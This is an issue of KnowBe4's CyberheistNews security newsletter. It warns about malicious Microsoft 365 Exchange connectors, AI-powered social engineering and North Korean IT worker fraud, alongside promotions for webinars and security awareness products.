CyberheistNews Vol 15 #31 [Heads Up] Malicious M365 Connectors Put 300M Accounts at Risk

[Heads Up] Malicious M365 Connectors Put 300M Accounts at Risk

Roger Grimes wrote an important blog post that immediately went viral. Here is a short summary, but I strongly recommend you read the whole blog post and defend against these malicious connectors!

There’s a growing threat targeting Microsoft 365 users (over 300 million of them, to be exact) and it’s flying under the radar. Bad actors are abusing malicious Exchange Connectors, rogue Outlook rules and custom forms to hijack email flows, wipe logs, reroute messages and sneak in backdoors for long-term access.

How do they get in? Simple: stolen credentials. Usually scooped up through phishing or social engineering. Once they’ve got access, attackers set up these connectors in a way that blends right in with legitimate configurations, making them tough to spot—especially in cloud environments like M365, not just old-school on-prem Exchange.

Microsoft recently updated their documentation acknowledging a spike in these attacks. One case involved a small business owner who got phished. A rogue connector labeled “games” was quietly created and used to reroute invoice payments—costing the company big.

Read the blog post and find out what you can do to fight back!

Blog post with links:
https://blog.knowbe4.com/malicious-connectors-potentially-impact-hundreds-of-millions-of-microsoft-365-users

[Live Demo] Ridiculously Easy AI-Powered Security Awareness Training and Phishing

Phishing and social engineering remain the #1 cyber threat to your organization, with 68% of data breaches caused by human error. Your security team needs an easy way to deliver personalized training—this is precisely what our AI Defense Agents provide.

​​Join us for a demo showcasing KnowBe4’s leading-edge approach to human risk management with agentic AI that delivers personalized, relevant and adaptive security awareness training with minimal admin effort.

See how easy it is to train and phish your users with KnowBe4′ HRM+ platform:

• SmartRisk Agent™ – Generate actionable data and metrics to help you lower your organization’s human risk score
• Template Generator Agent – Create convincing phishing simulations, including Callback Phishing, that mimic real threats. The Recommended Landing Pages Agent then suggests appropriate landing pages based on AI-generated templates
• Automated Training Agent – Automatically identify high-risk users and assign personalized training
• Knowledge Refresher Agent and Policy Quizzes Agent – Reinforce your security program and organizational policies.
• Enhanced Executive Reports – Track user activities, visualize trends, download widgets, and improve searching/sorting to provide deeper insights and streamline collaboration

See how these powerful AI-driven features work together to dramatically reduce your organization’s risk while saving your team valuable time.

Date/Time: TOMORROW, Wednesday, August 6 @ 2:00 PM (ET)

Save My Spot:
https://info.knowbe4.com/kmsat-demo-2?partnerref=CHN2

[A Present] Best Security Practices for AI Prompting and Building Agents [PDF]

As KnowBe4’s new Executive Chair I was asked to “live two years in the future” and do as much research on AI as I could, to guide KnowBe4 even further in the AI future. I have immersed myself in some exciting research projects that I will tell you more about, but in the meantime, I have a little present I wanted to share with you now.

Bob Fabien wrote on X: “While some are still paying over a grand for AI courses, the biggest players are giving away high-value resources at no cost. From prompt engineering to agent frameworks, it is all here.”

I grabbed the new Agent Mode of OpenAI and told it to create an executive summary of the best practices in all these guides and documents. Then I ran an edit over it for readability and completeness.

I also included a case study: Building a Cybersecurity Incident Classifier.

Hoping this saves you a bunch of time. Here it is as a 21-page PDF, great for your next lunch and learn. Enjoy! [No registration required]
https://blog.knowbe4.com/new-whitepaper-best-security-practices-for-ai-prompting-and-building-agent-systems

Beyond DMARC: Closing Critical Gaps in Your Email Security Shield

Think your email is safe because you’ve implemented DMARC? Think again. While DMARC, SPF and DKIM are essential standards for preventing domain spoofing, sophisticated attackers are exploiting hidden vulnerabilities that these protocols alone can’t address. The result? Dangerous phishing emails are still landing in your users’ inboxes, even when you think you’ve done everything right.

Join Roger Grimes, KnowBe4’s Data-Driven Defense Evangelist, as he exposes the critical gaps in standard email authentication protocols and demonstrates how to build a truly comprehensive email security strategy combining proper DMARC implementation with advanced cloud email security.

You’ll discover:

• Step-by-step guidance to properly implement DMARC, SPF and DKIM to maximize their effectiveness
• The six sophisticated techniques cybercriminals are using right now to bypass standard email authentication
• The common DMARC setup mistakes that are leaving your organization vulnerable without you realizing it
• How cloud email security works alongside DMARC to create an impenetrable defense
• Why security awareness training remains your critical last line of defense and how to optimize it

Don’t let a false sense of security leave your organization exposed. Learn how to build a truly comprehensive email security strategy that combines technical controls with human vigilance, and earn CPE credit for attending!

Date/Time: Wednesday, August 13 @ 2:00 PM (ET)

Can’t attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

Save My Spot:
https://info.knowbe4.com/dmarc-webinar-2025?partnerref=CHN

[FINALLY!] Integrate SecurityCoach with Microsoft Edge for Business

Managing the security gap between your technical defenses and user behavior just got easier. KnowBe4 SecurityCoach for Microsoft Edge for Business integration has been released. As one of the only human risk management platforms with a native reporting connector in Microsoft Edge for Business, SecurityCoach now transforms your user’s browser into your real-time coaching platform.

It delivers immediate guidance when users engage in risky browser behavior, such as visiting suspicious websites, reusing passwords or attempting to bypass security warnings.

You may not know this, but Microsoft Edge is by far the leading browser in Enterprise settings. It dominates the segment with adoption by 61% of corporate IT departments, largely due to its seamless integration with AD, M365 and the Windows ecosystems.

You should see it in action for yourself. Start here.

Blog post with links:
https://blog.knowbe4.com/boost-your-browsing-security-integrate-securitycoach-with-microsoft-edge-for-business

Your Guide to Preserving Information Barriers in Microsoft 365

Our research shows 66% of organizations have had their email information barriers breached, resulting in major consequences like disrupted operations, client churn and regulatory penalties.

A new approach to augment static data loss prevention (DLP) barriers is needed.

This guide reveals how intelligent email DLP enables firms to take a proactive approach to enforcing information barriers, preventing incidents before they happen.

A New Approach with Intelligent Email DLP

Discover how an intelligent DLP solution can help your organization:

• Dynamically analyze emails and uphold barriers before data is sent
• Leverage existing data classifications and group permissions automatically
• Provide employees chances to self-correct mistakes in real-time

Download this whitepaper today to get insights into the limitations of static DLP rules, the benefits of intelligent email filtering and the competitive advantages gained through properly separating confidential data flows.

Download Now:
https://info.knowbe4.com/ciso-strategy-guide-preserving-email-information-barriers-micorsoft-365-chn

Let’s stay safe out there.

Warm regards,

Stu Sjouwerman, SACP
Executive Chairman
KnowBe4, Inc.

PS: [BUDGET AMMO] I’m a cybersecurity CEO who advises over 9,000 agencies and Sam Altman is wrong that the AI fraud crisis is coming—it’s already here:
https://fortune.com/2025/07/31/sam-altman-warning-ai-fraud-already-here-cybersecurity-lexisnexis-commentary/

PPS: [Black Hat 2025] Forecast: AI Mayhem, EV Intrusions, and Hacker Innovations. See you at 3pm at booth #1661 on the 6th!:
https://www.pcmag.com/news/black-hat-2025-forecast-ai-mayhem-ev-intrusions-hacker-innovations?

You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-15-31-heads-up-malicious-m365-connectors-put-300m-accounts-at-risk

AI-Powered Social Engineering Attacks Grow Even More Sophisticated

Social engineering remained the most common initial access vector in cyberattacks over the past year, according to a new report from Palo Alto Networks’ Unit 42.

Threat actors are increasingly using varied tactics to trick employees into granting them a foothold. “These attacks consistently bypassed technical controls by targeting human workflows, exploiting trust and manipulating identity systems,” Unit 42 says.

“More than one-third of social engineering incidents involved non-phishing techniques, including search engine optimization (SEO) poisoning, fake system prompts and help desk manipulation.”

Attackers are also refining their social engineering techniques, moving very quickly from initial access to lateral movement and privilege escalation. “Threat actors such as Muddled Libra bypass multi-factor authentication (MFA) and exploit IT support processes to escalate privileges in minutes, often without malware,” the researchers write.

“In one case, a threat actor moved from access to domain administrator in under 40 minutes using only built-in tools and social pretexts.” Notably, threat actors are using generative AI tools to craft extremely convincing, targeted phishing content.

“Used to produce credible, human-like content across channels including email, voice and live chat,” Unit 42 says. “In multiple investigations, threat actors employed GenAI to craft highly personalized lures using public information.

Some campaigns went further, using cloned executive voices in callback scams to increase the plausibility of urgent phone requests. In more sustained intrusions AI was used to refine attacker personas, generate tailored phishing follow-ups and draft real-time responses.

These adaptive techniques allowed threat actors to maintain engagement across multiple stages of the intrusion, with a level of tone and timing that previously required a live operator.”

KnowBe4 empowers your workforce to make smarter security decisions every day.

Unit 42 has the story:
https://unit42.paloaltonetworks.com/2025-unit-42-global-incident-response-report-social-engineering-edition/

FBI Issues Guidance on Thwarting North Korea’s Fraudulent IT Schemes

The FBI has issued an advisory warning that North Korean IT workers continue to seek fraudulent employment at Western companies. These workers attempt to secure multiple remote jobs in order to generate revenue for Pyongyang, and in some cases use their access to steal data or deploy ransomware.

The individuals use social engineering techniques to trick employers into hiring them, then work with US-based facilitators to continue the ruse.

The advisory recommends that organizations carefully examine identity documents for misspellings or errors, and verify employment or education history by contacting former employers or schools directly.

The FBI also recommends in-person meetings to verify that a person isn’t lying about their identity. If a virtual meeting is necessary, the Bureau offers the following advice:

• Mandate video and request that their backgrounds be unobscured.
• Have the individual point the camera out a window and ask questions about their claimed current location and the location listed on their identification documents.
• Ask the individual to wave their hand in front of their face as it may prompt a malfunction in AI generated video.

Additionally, the advisory notes, “Capture images for comparison with future meetings. Sometimes an individual is employed to pass the initial interview, but the on-the-job work is completed by a different individual.”

Additionally, organizations should ensure their contractors are aware of these techniques. “If your company employs contracted IT workers that have been hired by a third-party company, seek to educate the third-party company about this guidance,” the FBI says.

“Contract IT work is a common way that North Korean IT workers procure employment.” KnowBe4 security awareness training gives your organization an essential layer of defense against social engineering attacks.

The FBI has the story:
https://www.ic3.gov/PSA/2025/PSA250723-4